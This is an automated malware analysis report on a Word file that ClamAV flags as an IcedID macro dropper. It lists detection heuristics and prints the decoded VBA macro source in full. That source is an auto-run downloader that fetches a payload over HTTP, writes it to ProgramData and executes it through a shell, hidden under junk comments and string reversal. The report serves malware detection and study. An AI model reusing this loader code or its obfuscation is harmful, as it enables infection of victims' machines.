Office (OOXML) malware analysis — malicious · d53f2b53ae15df89

MALICIOUS

Office (OOXML)

141.7 KB Created: 2020-10-19 09:53:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-10-25

MD5: 3495cd6a1f489d336a8c68f5346e6a08 SHA-1: 26df312eb6adf303f28d47c2dbd3813b481f145a SHA-256: d53f2b53ae15df89af5dd0da86ba78884dd857b6e659a190ce91a4f3182edb59

290 Risk Score

Heuristics 7

ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
VBA project inside OOXML medium 4 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
Set yxENl = CreateObject(VEGIY + "." + "shell")
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set HyWvF = VBA.CreateObject(ThYpy + "" + VJjjf)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	12479 bytes
SHA-256: `211b7cb11a2933fa1f8e9f0370d6ea740486d746b11f5384b7cf0815e0f5c961`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "VBVWC" Sub njvfb(JTgIr, Optional ByVal frhmK As String = "c:\programdata\HYDHB.txt", Optional ByVal VJjjf As String = "systemobject") ' Prefabs suggest flatus ' Piper digestible dogfights ' Gelatinous yule sugars ' Slave puling gutsy ' Mannerist disorder inevitability spigot wetly ' Parentsinlaw anchoring overacted ensued ' Itinerary legality widens eraser devise syncopated ' Deferral carcinogen pallbearers ' Homicidal lopes reprocessed ell appetiser decimals ' Redemption pavilions zoology ' Sows quondam lacework sjambok arabians ' Isometrically ' Neoprene loutish inhibit taxpaying bathrooms shivered ' Skimmer ' Unstacking magnanimity scientist schematics ' Coining aldermen harpoon ' Inescapably directs poison lockers straightforwardly ' Impolite ' Patronised varied calorimetry clock zooplankton Set HyWvF = VBA.CreateObject(ThYpy + "" + VJjjf) ' Unmasks proclaimers sensor ' Notwithstanding deputise ' Transponders reruns ' Incubation dumbfounds conspecific cliques speculatively Set hAANf = HyWvF.CreateTextFile(frhmK) ' Proclaimers deacons eight heading ' Zest cheerfulness protractors ' Matchbox slanderers refrigerant ' Cruelties tampers adjusting ' Skiing throttled kiss ' Exchanges eldorado middleweight conjurers hAANf.WriteLine JTgIr ' Receivers molds minder opening mentalities ' Bridleways inactivation ' Meet reconnect exmember ' Orientation citruses ' Regretfully discoursed math decrees sabres ' Puppeteer banqueting loser hAANf.Close ' Betrayal nostalgia ' Icecold gnawed beekeepers ' Achiever throwaway grief ' Flawed schoolmasters mango consular breeze ' Tragedians airlifting ' Undergraduates spectrophotometry neaten ' Salmonella chess urine aria ' Plankton forgetfulness retentive stoic loftily ' Lubricants ' Revolvers sodium shanks institutionalising ' Occupier seaport nationalising disembarkation ' Subsections accusers heeds ' Recalls obfuscate ' Flaxen ' Adopt ' Resentful ' Requisitioned shiny manured bemuse ' Discusses hydrants brass ' Illiberal victoriously libeler ' Virile ' Singed ' Completable detail ' Facilitators ceilidh scores eagle reimposed ' Clotted ' Missionary property whole ' Fascism strive ' Writer girdles stymie ' Nuzzles etcher equivalently ' Exercise urbanised pontoons plan fallacy ' Fizzled authoring rerolled ' Corsage pampas ' Botched perannum End Sub ' Undertakings modifications ' Squiggles ' Observations isolating ' Upper uncollimated churns wariness Sub AutoOpen() ' Venturesome tannins ' Pontification dewy wadings ' Arrived upbraid ' Conics ' Weevil sober ' Shoulders supplement clip ' Favour inflexible ' Marigolds inflowing dignifying ' Grate bronco maldives ' Illusionist kaleidoscope garrison lifelines sheared boroughs ' Unwatched pelmet despotism ' Creativeness ' Dimpled indiscriminate celsius arthur ' Backtrack refining ' Ingrown stodgiest prostrating ' Storages stymie restaurateur cleaves spheric ' Sheathed france ranching ' Communicant pigs orang ' Postural debone relevantly ' Winces negativeness anon joins ' Clipping assessments establishes ' Tequila narcosis segregated cacti ' Shuttles benediction ' Fortuneteller classing glints entomologists ' Piper levitated ' Disturbing operated ringers tachyon vaseline deficits ' Reloads witheringly Dim yBDCN As New XRtAu ' Spheroid interbreed derelict homing shearwater wrecked ' Unspoiled technologist inapplicable administrator ' Unfetchable closing ' Pretoria everlastingly reciting ' Retracing ' Ebbed DwDFo = "" ' Overreaction outright ' Sleuths fresher ' Velvet offensives foolishness preview ' Thereunder appending patients ' Repose reworking tranches acreage voraciously ' Tendered ' Cortex jackdaws bungalows ' Blackmailer prefix recur ' Irrelevances antagonising delicacy infatuated ' Circumvent pertinent ' Correlated convector qualitatively holograms JTgIr = yBDCN.xSRTf(VxHkW) ' Sporrans carelessly misconception ' Proliferative beavering ' Validating maladjustment snowballed ' Malformation deepseated ' Recombinant zealotry ecologists glaciologists psalms ' Paidup inescapably wriggles ' Brides njvfb TFpnS(JTgIr) ' Slowdown gaining royals spittoons ember ' Desultory thuds dryly ' Worshipped denigrating cancelling costeffectiveness apparatus ' Heathery ribosomal ' Washes squirms proctors phosphorescence ' Succinctly policyholders lattices restructures ' Coarsens termini ' Resolved scooping ' Dirtily wafer forecourts greenhouse KbYgR mJDgz(0) + "vr32 c:\programdata\HYDHB.txt", "wscript" End Sub Function Sxxoe(EBVEJ, nnwRV) ' Gel gyms ' Hurdles babe underbelly ' Tenuous nil telegraphic ' Unavenged etherised ngoing hake ' Hydroxides chamberpot pallmall Sxxoe = Split(EBVEJ, nnwRV) End Function Attribute VB_Name = "uTrxY" ' Shanty payer prodigious pasteboard inspectorate ' Sedimentation ' Participative ignited launderette reunions twined ' Tinkering woodcuts meaningfully realisations ' Overmanning saintly Function TFpnS(mVwGe) ' Settlers evader transferable ' Audacity microfilming polycrystalline soundings cultivators ' Angelic accidentally grizzled ' Aisles sleepiest inculcated inform cooks ' Told disestablishing rwanda ' Expend TFpnS = StrConv(mVwGe, vbUnicode) ' Protesters expressionists apprehend ' Batters ' Replaces guesswork ' Torsion ' Pups certify greyness ' Unserviced villager End Function ' Queen ' Levitates prostitute governors climbing ' Flying terminations haters burgeon thickest snorers ' Vocalists Function hMqkq() ' Zambezi luxury ' Modulations assigner ' Dined misdirecting garments tablet estimable ' Risen braking ' Hump ' Terrors queues velum shogun ' Sawed wickedness almonds ' Shoplifter shipboard beltings offset ' Curious honourably disbursement splaying ' Avoid ' Stripes permutes agiler unkindest With ActiveDocument.shapes(1) hMqkq = .AlternativeText End With End Function ' Dealing manuals cyberpunk ' Wont ' Hapless treasures indolence flaws ' Decilitre relentlessly retirement Function mJDgz(oykqm) ' Beware bluffer ulterior ' Capri sump economise ' Innumerable fabricate oafish ' Granules budapest steer mutants lopsided euphemisms undertakers ' Otherness media skunks merchantable undercroft prowl ' Consorting unhuman rawest ' Wordiest still unsigned ' Hosta handsome knot invalidity scintillate ' Summertime drystone ' Demagogue ' Depolarisations smelly unofficial MJZJv = Sxxoe(hMqkq(), "~~~") awiHw = MJZJv(oykqm) mJDgz = awiHw End Function Attribute VB_Name = "XRtAu" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Function SbHmk(WNyph, mWYtb, ktozA) ' Pastime airing madrigals ' Whiteness smashing ' Spooning yuppie ' Projectors perusal brides SbHmk = Mid(WNyph, mWYtb, ktozA) End Function Public Function QAZaV(UILCG, AdhFS) ' Start ' Coincide blushing ' Neuroscientists files interfere ' Gaining crosses engorge ' Lozenge ' Relent memo inescapable ' Tricking photosensitive ' Flavourings frontiers perfidiously ' Lyricists regent ' Discountability enzyme dictate heady relationally ' Recruit detox ' Wildebeest ' Seller cinch kissed probability ' Legalising ' Polynomials spellbinding microcomputer lisps ' Injured ' Invalided enjoying fusiliers friendlier hMhxb = Trim(UILCG) For UnYAW = AdhFS To Len(hMhxb) MwzLQ = SbHmk(hMhxb, UnYAW, AdhFS) & MwzLQ Next UnYAW QAZaV = MwzLQ End Function ' Rarer subsidies ' Little triplane ' Alias month scabbed ' Coquette butchering deride genuine ouch planters synonymously Function xSRTf(cfHUq) ' Unremitting attachment secondbest ' Oboist squads ' Satisfiable greets coronet ' Shrouds dumber ' Fabled relegating wifeless ' Creamier windsor cusps combustion ' Accrue extractions quenching thirty inflection Dim HzBSD As Object ' Mansized rime imperium habitual ' Pamphlets packets clogged dosage ' Beaux ' Compressional halo subject weaved ' Swarms pity floods ' Replaceable potentiometer ameliorated ' Sung art ' Papering grieves sewage vine flintlocks ' Racism ' Voiced defend ' Corpora beadwork decelerations gridded Set HzBSD = CreateObject(QAZaV(cfHUq, 1) + "." + QAZaV(cfHUq, 1) + "Request.5.1") ' Projection impishness fingernail physically numerous thinner ' Attempting ' Teds apnea unemployable ducklings ' Greed complementarity ' Sumatra beatify ' Canopied allocatable ' Coin gifting aviator ' Simultaneously theoreticians scotsman ' Lustful unnecessarily crewmen ' Maturity commander ' Safer serviette ' Cinnamon drapers battling goads account inconspicuous tinderbox falsehoods ' Helpmate assassinating robins ' Repaired bedside ' Algorithms marionette prefers scathing ' Tincan reconnoitring palisades ' Idea septets dismissing chancery water ' Debacles ocelots repartitioned terminators wining ' Understand camp increment ' Immigrants proposition ' Mania wraparound disallowed ' Unpractical groggy ' Errs connecting ' Passageways mechanisable polity recover EimGS = mJDgz(1) ' Majorettes distinctiveness despoil tit ' Examine legates fingers clams paddocks ' Prestidigitatorial disaffiliation scores guilelessness ' Administrative harped continuable rapacious ' Idolise crates redundancy ' Lower unjamming goriest across saturating ' Premises focused herbicide confusable old unbalanced loathsomeness ' Entrench pancakes refinancing intimacy domesticated unstopped HzBSD.Open "GET", QAZaV(EimGS, 1), False ' Aridity idiocies blackcurrant velvets gipsies hastens ' Valid disparagingly pancaked ' Payroll indicts warners cholesterol asphyxia ' Vivid HzBSD.Send ' Grasping shallower limitless impressiveness molarities astronomically ' Blinks heterodox hibernal ' Plenipotentiary shivering loped monologue ' Hobbit expansively ' Reportage obtrusiveness supertankers xSRTf = HzBSD.responsebody End Function Attribute VB_Name = "ZuDhV" Public Const VxHkW As String = "ptthniw" Public Const ThYpy As String = "scripting.file" Sub KbYgR(SlLYe, VEGIY) ' Thruster investigating developing flunked ' Concert sapping jetting chronic ' Plunderers concluded siphoning ' Beermat trenched ' Damned reinventions ' Diligently pounced redeveloped ' Unveil Set yxENl = CreateObject(VEGIY + "." + "shell") ' Idler stuffer birthrights aural ' Planet manhandling ambushes titter onlybegotten ' Chilly implied detestably abeyance ' Unlimited herbicides solace ' Stirfried pangs ' Soak botany ' Wrangling digestible vitamins acquainted healthier ' Insistently weevils protectively novelists ' Salvages nobler ' Nonbelievers bribes averred ' Alighted neighbourhoods peacock ' Coefficient ' Eventing ' Breweries ' Sauerkraut ached ' Debauched hardened coleslaw uninjured ' Flipping while cousins ' Mistrustfully ' Sabotaging walk lenders ' Reprocessing impersonating manipulative flours ' Collude gravures hiccough reflexes ' Benighted samba anonymously ' Pontifical anticoagulants conceding naturally shortens ' Guttersnipes bagfuls baseline ' Untruths tapir adjudications violated checklist ' Fertilisation lugged gentler culturing firmament ' Cruxes homologue bloodsports postman judder ' Both exploitative immoveable ' Everywhere enviously creaked displace ' Horticulturist ovular corticosteroids kilted ' Concertgoers dramatist lurks cloaks groundnut ' Dorsally mortgagee ' Feelings ' Entombment sunbath ' Tapioca huge ' Increases ' Meticulously atlantis gamut massing ' Obstructions anaesthetics ' Mitre impious uninfected tumultuous vocabularies correspondences ' Lender concerted refluxed misfire ' Editing assimilated seeable nicety ' Balls infecting ' Regaining roar enforced festal purports ' Tersely ranger badger compressed nightclothes scrupulous Call yxENl.exec(SlLYe) ' Earlobes evilly ' Eiderdown mindful ' Tetra excavator gestalt ' Rampaged excusable ' Hug sulkiness illusions letterboxes mermen shut End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	46592 bytes
SHA-256: `934f604e55104a7aacfcac781baad115ff805a8bc39258a9ae2806b991fab497`
Detection ClamAV: Doc.Macro.ICEID1020-9781212-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.